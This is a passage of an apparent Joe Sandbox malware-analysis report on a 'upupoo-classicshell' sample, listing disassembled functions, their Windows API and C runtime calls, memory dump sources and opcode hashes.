                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Process$CurrentExitTerminate
                                                                                                              • String ID:
                                                                                                              • API String ID: 1703294689-0
                                                                                                              • Opcode ID: b23f55cf730a95eccbe120a9b3501a633d8a2def951e338c5c1664c595140054
                                                                                                              • Instruction ID: 013a2e2a3a458274b85be1ad4d4c490a12209638f2f1e0f55c36716606bf4c76
                                                                                                              • Opcode Fuzzy Hash: b23f55cf730a95eccbe120a9b3501a633d8a2def951e338c5c1664c595140054
                                                                                                              • Instruction Fuzzy Hash: F8E01A31424648EFCF116FD4CA48B993BA9BF55385B000414F81447120DF379845CE40
                                                                                                              Function 6E0A7CD4 Relevance: 38.8, APIs: 8, Strings: 14, Instructions: 295libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                                • Part of subcall function 6E0A783D: LoadLibraryW.KERNEL32 ref: 6E0A795C
                                                                                                                • Part of subcall function 6E0A783D: LoadLibraryW.KERNEL32(?), ref: 6E0A7965
                                                                                                                • Part of subcall function 6E0A783D: GetProcAddress.KERNEL32(00000000,?), ref: 6E0A798B
                                                                                                                • Part of subcall function 6E0A783D: GetProcAddress.KERNEL32(00000000,?), ref: 6E0A799A
                                                                                                                • Part of subcall function 6E0A783D: GetProcAddress.KERNEL32(00000000,?), ref: 6E0A79A4
                                                                                                              • LoadLibraryW.KERNEL32(?,00000001,00000000,?,?), ref: 6E0A7DC0
                                                                                                              • LoadLibraryW.KERNEL32(?,?,?), ref: 6E0A7DC9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7ED9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7EE9
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7EF9
                                                                                                              • GetProcAddress.KERNEL32(00000000,00000043), ref: 6E0A7F09
                                                                                                              • GetProcAddress.KERNEL32(00000000,00006946), ref: 6E0A7F16
                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 6E0A7F26
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressProc$LibraryLoad
                                                                                                              • String ID: C$ExW$Fi$P$W$cW$l$lls$ndW$p$r$ry$thAp$v
                                                                                                              • API String ID: 2238633743-3144811114
                                                                                                              • Opcode ID: afa0dd47e335872a58e0b030dc693a57af7038e8f7e63529db081258b331063e
                                                                                                              • Instruction ID: 72551cee6a133fdea967f897432d9e55b469b22ff30d9e1bfb515c599c32ee5d
                                                                                                              • Opcode Fuzzy Hash: afa0dd47e335872a58e0b030dc693a57af7038e8f7e63529db081258b331063e
                                                                                                              • Instruction Fuzzy Hash: B3C1F92156C3C499E330CBA49851BABB7E4FFA5B10F106D1EE6C8CB2A1E7B14544C75B
                                                                                                              Function 100051AC Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 100052B0
                                                                                                              • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 1000532B
                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 100053A9
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 1000542B
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 1000545C
                                                                                                              • FindHandlerForForeignException.LIBVCRUNTIME ref: 100054AB
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 100054CD
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 100054E5
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 100054ED
                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 100054F9
                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 10005504
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                                                                              • String ID: csm$csm$csm
                                                                                                              • API String ID: 410073093-393685449
                                                                                                              • Opcode ID: 28e85d9537e823bd0f3738717f75f5abad39e737950120410e219715fdd589e1
                                                                                                              • Instruction ID: e7e5ebab23954d1ba523b912dc674d2a6081c75374b45c11898d79fb377913f1
                                                                                                              • Opcode Fuzzy Hash: 28e85d9537e823bd0f3738717f75f5abad39e737950120410e219715fdd589e1
                                                                                                              • Instruction Fuzzy Hash: 4EB1AB3480070AAFEF20CF94C841ADFBBB5FF09396F114259E80127659C776EA95CBA1
                                                                                                              Function 6E0ABF44 Relevance: 24.8, APIs: 11, Strings: 3, Instructions: 270COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E0AC048
                                                                                                              • _GetRangeOfTrysToCheck.LIBVCRUNTIME ref: 6E0AC0C3
                                                                                                              • ___TypeMatch.LIBVCRUNTIME ref: 6E0AC141
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 6E0AC1C3
                                                                                                              • IsInExceptionSpec.LIBVCRUNTIME ref: 6E0AC1F4
                                                                                                              • FindHandlerForForeignException.LIBVCRUNTIME ref: 6E0AC243
                                                                                                              • ___DestructExceptionObject.LIBVCRUNTIME ref: 6E0AC265
                                                                                                              • __CxxThrowException@8.LIBVCRUNTIME ref: 6E0AC27D
                                                                                                              • _UnwindNestedFrames.LIBCMT ref: 6E0AC285
                                                                                                              • ___FrameUnwindToState.LIBVCRUNTIME ref: 6E0AC291
                                                                                                              • CallUnexpected.LIBVCRUNTIME ref: 6E0AC29C
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Exception$DestructObjectSpecUnwind$CallCheckException@8FindForeignFrameFramesHandlerMatchNestedRangeStateThrowTrysTypeUnexpected
                                                                                                              • String ID: csm$csm$csm
                                                                                                              • API String ID: 410073093-393685449
                                                                                                              • Opcode ID: b688430083aa5f6bef1698166671e0bd984232be9151ec0a45668486d8f44865
                                                                                                              • Instruction ID: 20132f1c1da1871fc61431d3e343e1e3f716792fd5a4660ebcbe5e2dfd0d75b8
                                                                                                              • Opcode Fuzzy Hash: b688430083aa5f6bef1698166671e0bd984232be9151ec0a45668486d8f44865
                                                                                                              • Instruction Fuzzy Hash: 3FB1667180020E9FCF10CFD8C880B9EB7F9BF59354F024959EA146B656D335AA51CFA1
                                                                                                              Function 00C246D7 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 68memorylibraryloaderCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • IsProcessorFeaturePresent.KERNEL32(0000000C,00C247AD,?,00C2133E), ref: 00C246D9
                                                                                                              • LoadLibraryA.KERNEL32(kernel32.dll,?,?,?,?,00C2133E), ref: 00C246F2
                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPushEntrySList), ref: 00C2470C
                                                                                                              • GetProcAddress.KERNEL32(00000000,InterlockedPopEntrySList), ref: 00C24719
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000008,?,?,?,?,00C2133E), ref: 00C2474B
                                                                                                              • HeapAlloc.KERNEL32(00000000,?,?,?,?,00C2133E), ref: 00C2474E
                                                                                                              • InterlockedCompareExchange.KERNEL32(?,00000000,00000000), ref: 00C24764
                                                                                                              • GetProcessHeap.KERNEL32(00000000,00000000,?,?,?,?,00C2133E), ref: 00C24771
                                                                                                              • HeapFree.KERNEL32(00000000,?,?,?,?,00C2133E), ref: 00C24774
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: Heap$AddressProcProcess$AllocCompareExchangeFeatureFreeInterlockedLibraryLoadPresentProcessor
                                                                                                              • String ID: InterlockedPopEntrySList$InterlockedPushEntrySList$kernel32.dll
                                                                                                              • API String ID: 3830925854-2586642590
                                                                                                              • Opcode ID: e0a9452c3c574c0ebc3416389c567db5dad77e3c634148796c65eb5746204f63
                                                                                                              • Instruction ID: b55d77980c238985982468fa879bf50d9c11484236601a7dd2a8908791d4c9b2
                                                                                                              • Opcode Fuzzy Hash: e0a9452c3c574c0ebc3416389c567db5dad77e3c634148796c65eb5746204f63
                                                                                                              • Instruction Fuzzy Hash: 46116D71A203A1AFDB20DFF9AC88B1E7AACEB49B42B054439E511C3250DB708901CB60
                                                                                                              Function 10009DC3 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 10009E07
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABAF
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABC1
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABD3
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABE5
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000ABF7
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC09
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC1B
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC2D
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC3F
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC51
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC63
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC75
                                                                                                                • Part of subcall function 1000AB92: _free.LIBCMT ref: 1000AC87
                                                                                                              • _free.LIBCMT ref: 10009DFC
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 10009E1E
                                                                                                              • _free.LIBCMT ref: 10009E33
                                                                                                              • _free.LIBCMT ref: 10009E3E
                                                                                                              • _free.LIBCMT ref: 10009E60
                                                                                                              • _free.LIBCMT ref: 10009E73
                                                                                                              • _free.LIBCMT ref: 10009E81
                                                                                                              • _free.LIBCMT ref: 10009E8C
                                                                                                              • _free.LIBCMT ref: 10009EC4
                                                                                                              • _free.LIBCMT ref: 10009ECB
                                                                                                              • _free.LIBCMT ref: 10009EE8
                                                                                                              • _free.LIBCMT ref: 10009F00
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: 9b8d6b642b3fe7adbadd563faff1799b9fe67ef26343c44727cecfe6d835cf6e
                                                                                                              • Instruction ID: 18af7cc24efe9eb99d0d7cae4cc31abb0d5d8b52d7f5000be87298f4786c8f56
                                                                                                              • Opcode Fuzzy Hash: 9b8d6b642b3fe7adbadd563faff1799b9fe67ef26343c44727cecfe6d835cf6e
                                                                                                              • Instruction Fuzzy Hash: CF311731A043859BFB61DA39D845B6A73E9FF002D0F11442AE459D7299DF79BD80DB20
                                                                                                              Function 6E0B42F7 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • ___free_lconv_mon.LIBCMT ref: 6E0B433B
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4628
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B463A
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B464C
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B465E
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4670
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4682
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4694
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46A6
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46B8
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46CA
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46DC
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B46EE
                                                                                                                • Part of subcall function 6E0B460B: _free.LIBCMT ref: 6E0B4700
                                                                                                              • _free.LIBCMT ref: 6E0B4330
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B4352
                                                                                                              • _free.LIBCMT ref: 6E0B4367
                                                                                                              • _free.LIBCMT ref: 6E0B4372
                                                                                                              • _free.LIBCMT ref: 6E0B4394
                                                                                                              • _free.LIBCMT ref: 6E0B43A7
                                                                                                              • _free.LIBCMT ref: 6E0B43B5
                                                                                                              • _free.LIBCMT ref: 6E0B43C0
                                                                                                              • _free.LIBCMT ref: 6E0B43F8
                                                                                                              • _free.LIBCMT ref: 6E0B43FF
                                                                                                              • _free.LIBCMT ref: 6E0B441C
                                                                                                              • _free.LIBCMT ref: 6E0B4434
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                                                                              • String ID:
                                                                                                              • API String ID: 161543041-0
                                                                                                              • Opcode ID: a732cd3373503f54fd2caa795b2edb2db7a00cb744531d2ae425a4e5d65a16fa
                                                                                                              • Instruction ID: f64c5e7e220ef1f6330af5e84d58ac6fa8bfe08a26de0c8e34ebf4ff88158883
                                                                                                              • Opcode Fuzzy Hash: a732cd3373503f54fd2caa795b2edb2db7a00cb744531d2ae425a4e5d65a16fa
                                                                                                              • Instruction Fuzzy Hash: 0B317071508301EFEB518AF9E980B8E73E9FF00794F144919E069EB254FF32AA518720
                                                                                                              Function 00C274D3 Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 57libraryloaderCOMMONLIBRARYCODE
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00C363F0,0000000C,00C2760E,00000000,00000000,?,00C25FFC,00C27A05,00C25657,?,?,00C25FFC,00C22FE3,?,00C22FE3), ref: 00C274E5
                                                                                                              • __crt_waiting_on_module_handle.LIBCMT ref: 00C274F0
                                                                                                                • Part of subcall function 00C29AAF: Sleep.KERNEL32(000003E8,?,?,00C27436,KERNEL32.DLL,?,00C29FEA,?,00C25651,00C25FFC,?,?,00C25FFC,00C22FE3,?,00C22FE3), ref: 00C29ABB
                                                                                                                • Part of subcall function 00C29AAF: GetModuleHandleW.KERNEL32(00C25FFC,?,?,00C27436,KERNEL32.DLL,?,00C29FEA,?,00C25651,00C25FFC,?,?,00C25FFC,00C22FE3,?,00C22FE3), ref: 00C29AC4
                                                                                                              • GetProcAddress.KERNEL32(00000000,EncodePointer), ref: 00C27519
                                                                                                              • GetProcAddress.KERNEL32(00C25FFC,DecodePointer), ref: 00C27529
                                                                                                              • __lock.LIBCMT ref: 00C2754B
                                                                                                              • InterlockedIncrement.KERNEL32(F08B0000), ref: 00C27558
                                                                                                              • __lock.LIBCMT ref: 00C2756C
                                                                                                              • ___addlocaleref.LIBCMT ref: 00C2758A
                                                                                                              Strings
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357378295.0000000000C21000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00C20000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357349414.0000000000C20000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357440949.0000000000C33000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357465932.0000000000C38000.00000004.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357496454.0000000000C3C000.00000002.00000001.01000000.0000000B.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_c20000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: AddressHandleModuleProc__lock$IncrementInterlockedSleep___addlocaleref__crt_waiting_on_module_handle
                                                                                                              • String ID: DecodePointer$EncodePointer$KERNEL32.DLL
                                                                                                              • API String ID: 1028249917-2843748187
                                                                                                              • Opcode ID: fecc1b5498271ee0c1ad28ea55c5ae53381cc38e27533bcb84a27ef040d92242
                                                                                                              • Instruction ID: dabf3ed6750e1f79e4533842146ee53cad3c760701735daf3a8cf779601ae04f
                                                                                                              • Opcode Fuzzy Hash: fecc1b5498271ee0c1ad28ea55c5ae53381cc38e27533bcb84a27ef040d92242
                                                                                                              • Instruction Fuzzy Hash: 9711E1B1904B11EFDB20EF75E841B8EFBE0AF14310F10462DE4A996BA1CB74AA40DF50
                                                                                                              Function 10008191 Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 100081A5
                                                                                                                • Part of subcall function 10007D68: HeapFree.KERNEL32(00000000,00000000,?,100079B7,00000001,00000001), ref: 10007D7E
                                                                                                                • Part of subcall function 10007D68: GetLastError.KERNEL32(A08361BA,?,100079B7,00000001,00000001), ref: 10007D90
                                                                                                              • _free.LIBCMT ref: 100081B1
                                                                                                              • _free.LIBCMT ref: 100081BC
                                                                                                              • _free.LIBCMT ref: 100081C7
                                                                                                              • _free.LIBCMT ref: 100081D2
                                                                                                              • _free.LIBCMT ref: 100081DD
                                                                                                              • _free.LIBCMT ref: 100081E8
                                                                                                              • _free.LIBCMT ref: 100081F3
                                                                                                              • _free.LIBCMT ref: 100081FE
                                                                                                              • _free.LIBCMT ref: 1000820C
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357704492.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357679875.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357728589.000000001000F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357751768.0000000010016000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357775198.0000000010018000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_10000000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: a87a5622d80a5fec1180487fedaa7e5dad31db6d37aaeb734d883ec773964e2c
                                                                                                              • Instruction ID: f64c62f210d3c4fab1e46b08c4a2babb921ab4eb9b72a43628e91e1a8baa87ed
                                                                                                              • Opcode Fuzzy Hash: a87a5622d80a5fec1180487fedaa7e5dad31db6d37aaeb734d883ec773964e2c
                                                                                                              • Instruction Fuzzy Hash: 4711747A900108AFEB51DF54C942CED3BB5FF05690F9140A6B9089B226DA35EE50EB80
                                                                                                              Function 6E0B151B Relevance: 15.1, APIs: 10, Instructions: 54COMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • _free.LIBCMT ref: 6E0B152F
                                                                                                                • Part of subcall function 6E0B0E49: HeapFree.KERNEL32(00000000,00000000,?,6E0B0797,00000001,00000001), ref: 6E0B0E5F
                                                                                                                • Part of subcall function 6E0B0E49: GetLastError.KERNEL32(E644DAF2,?,6E0B0797,00000001,00000001), ref: 6E0B0E71
                                                                                                              • _free.LIBCMT ref: 6E0B153B
                                                                                                              • _free.LIBCMT ref: 6E0B1546
                                                                                                              • _free.LIBCMT ref: 6E0B1551
                                                                                                              • _free.LIBCMT ref: 6E0B155C
                                                                                                              • _free.LIBCMT ref: 6E0B1567
                                                                                                              • _free.LIBCMT ref: 6E0B1572
                                                                                                              • _free.LIBCMT ref: 6E0B157D
                                                                                                              • _free.LIBCMT ref: 6E0B1588
                                                                                                              • _free.LIBCMT ref: 6E0B1596
                                                                                                              Memory Dump Source
                                                                                                              • Source File: 00000003.00000002.2357826488.000000006E091000.00000020.00000001.01000000.0000000C.sdmp, Offset: 6E090000, based on PE: true
                                                                                                              • Associated: 00000003.00000002.2357800390.000000006E090000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357861866.000000006E0BB000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357887722.000000006E0C5000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357910342.000000006E0C6000.00000008.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357935659.000000006E0C8000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              • Associated: 00000003.00000002.2357958732.000000006E0CC000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                              Joe Sandbox IDA Plugin
                                                                                                              • Snapshot File: hcaresult_3_2_6e090000_upupoo-classicshell.jbxd
                                                                                                              Similarity
                                                                                                              • API ID: _free$ErrorFreeHeapLast
                                                                                                              • String ID:
                                                                                                              • API String ID: 776569668-0
                                                                                                              • Opcode ID: 6e37525eceac3f533d3a38067f32e4099513106755e6482143bb62747d26b375
                                                                                                              • Instruction ID: 4c6f1e6c0d22536b2627a8f33bae01f68a904a43c2a0d92675463e9bd9c0599c
                                                                                                              • Opcode Fuzzy Hash: 6e37525eceac3f533d3a38067f32e4099513106755e6482143bb62747d26b375
                                                                                                              • Instruction Fuzzy Hash: E011A476104108EFCB01DFD6DA81EDD3BA9FF04354F5145A2FA189F225EB32DA509B80
                                                                                                              Function 00C218E0 Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 81windowsleepregistryCOMMON
                                                                                                              Download Yara Rule
                                                                                                              APIs
                                                                                                              • RegisterWindowMessageW.USER32(ClassicStartMenu.StartMenuMsg,?,?), ref: 00C2190F
                                                                                                              • PostMessageW.USER32(?,00000000), ref: 00C2191E
                                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 00C21945
                                                                                                              • Sleep.KERNEL32(00000064), ref: 00C21957
                                                                                                              • PostQuitMessage.USER32(00000000), ref: 00C2195F
                                                                                                              • UnhookWindowsHookEx.USER32(00000000), ref: 00C21988
                                                                                                                • Part of subcall function 00C213F0: ?DllLogToFile@@YAXPB_W0ZZ.CLASSICSTARTMENUDLL(Software\UpupooClassic\ClassicStartMenu\Settings|LogStartup|%LOCALAPPDATA%\ClassicShell\StartupLog.txt,StartMenu: Taskbar Created), ref: 00C213FD
                                                                                                                • Part of subcall function 00C213F0: SetTimer.USER32(?,00000001,00000064,00000000), ref: 00C21410
                                                                                                              Strings
                                                                                                              • ClassicStartMenu.StartMenuMsg, xrefs: 00C2190A
                                                                                                              Memory Dump Source
